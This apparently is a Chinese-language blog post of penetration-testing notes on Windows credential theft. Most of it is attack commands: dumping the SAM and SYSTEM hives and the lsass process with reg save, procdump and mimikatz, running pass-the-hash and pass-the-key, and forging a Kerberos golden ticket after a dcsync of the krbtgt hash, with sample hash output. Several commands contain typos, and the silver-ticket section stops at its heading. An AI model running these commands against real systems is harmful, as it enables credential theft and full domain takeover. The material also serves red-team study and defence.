windows系统散列值获取与利用

单机密码抓取与防范

想要获取windows操作系统中抓取散列值或明文密码,必须将权限提升至system。

本地用户名,散列值,其他安全验证信息都保存在sam文件中。

lsass.exe进程用于实现windows的安全策略(本地安全策略和登陆策略)

可以使用工具将散列值和明文密码从内存中的lsass.exe进程或SAM文件中导出

通过SAM和system文件抓取密码

SAM文件

1.导出SAM和system文件

无工具导出SAM文件

reg save hklm\sam sam.hive
reg save hklm\sytem system.hive

2.通过读取sam和system文件获得ntlm hash

mimikatz读取SAM和system文件

将sam.hive 和system.hive存放到mimikatz目录下

mimikatz# lsadump::sam /sam:sam.hive /system:sysytem.hive

mimikatz读取本地sam文件导出hash信息

需要在目标机上运行,必须考虑到目标机器上有免杀的特质

mimikatz# privilege::debug    #提升权限
mimikatz# token::elevate    #提权至system

#输入lsadump::sam 读取本地sam文件,获取NTLMhash

mimikatz读取在线的sam文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

LSASS.dmp文件

1.使用procdump导出lsass.dmp文件

procdump是微软官方发布的工具,可以在命令行下生成lsass文件导出,且不报毒

procdump.exe -accepteula -ma lsass.exe lsass.dmp

2.利用miimkatz导出lsass.dmp文件的密码hash

#将lsass.dmp文件加载到mimikatz目录中
sekurlsa:minidump lsass.dmp
#出现swtich to minidump字样,表示加载成功
#导出散列值 sekurlsa::logonpasswords full

 hash传递攻击  PASS THE HASH

使用NTLM HASH 进行hash传递

在目标机器中,以管理员权限进行mimikatz

mimikatz# "privilege debug" "sekurlsa::pth /user:administrator /domain:pentest.com /ntlm:xxxxxx

#弹出一个cmd.exe

aes-256密钥进行哈希传递

#mimikatz抓取aes256 
mimikatz# "privilege::debug" "sekurlsa::ekeys"
mimikatz# "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.com /aes256:sadfwerqwerxxxx...

#注意不会立刻弹cmd
需要补丁一个KB2871997才能横向移动

当安装了KB2871997仍然可以使用sid为500的administrator进行pash the key

票据传递攻击分析和利用

mimikatz使用hash传递必须具有本地管理员权限,票据传递不需要管理员权限

 黄金票据

原理:黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。

是有效的TGT Kerberos票据,因为它是由域账户加密和签名的  。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

1.获取域名

ipconfig /all

2.查询域内的所有计算机

net viem /domain:hacktb.com

3.查找域控制器的机器名

nltest /dclist:hacktb.com

4.查看有多少用户组

net group /domain

5.获取用户name和sid

wmic useraccount get name,sid

黄金票据的攻击实践

1.导出krbtgt的ntlm hash

mimikatz# lsadump::dcsync /domain:god.org /user:krbtgt

 得到

Hash NTLM: b097d7ed97495408e1537f706c357fc5 aes256_hmac (4096) : 5a75bb9a4fc4453c66621a54af111884f45bbca6365bf4d81bc059f31e708827 Object Security ID : S-1-5-21-1218902331-2157346161-1782232778

2.获取基本信息

  获取域sid

  wmic useraccount get name,sid

  采用这种方法,可以以普通域用户权限获取域内大部分用户的 SID,可以看到域 god.org 的域 SID 为:S-1-5-21-95064677-3481858386-3840636109。

  获取当前用户的sid

  whoami /user

   查询域管理员账户

  net group "domain admins" /domain  #domain admin用户组可以在net group /domain看到

   可以看到域管理员的用户名是Administrator

  查询域名

  ipconfig /all

3.黄金票据攻击

清空内存中的票据

mimikatz# kerberos::purge

#cmd下
klist purge

mimikatz生成票据

kerberos::golden /user:administrator /domain:god.org /sid:xfwafsdf /krbtgt:xcvwdfsdf /ticket:administrator.kiribi

传递票据并诸如内存

kerberos::ptt administrator.kiribi

 白银票据

原理

posted @ 2023-04-20 22:38  lisenMiller  阅读(719)  评论(0)    收藏  举报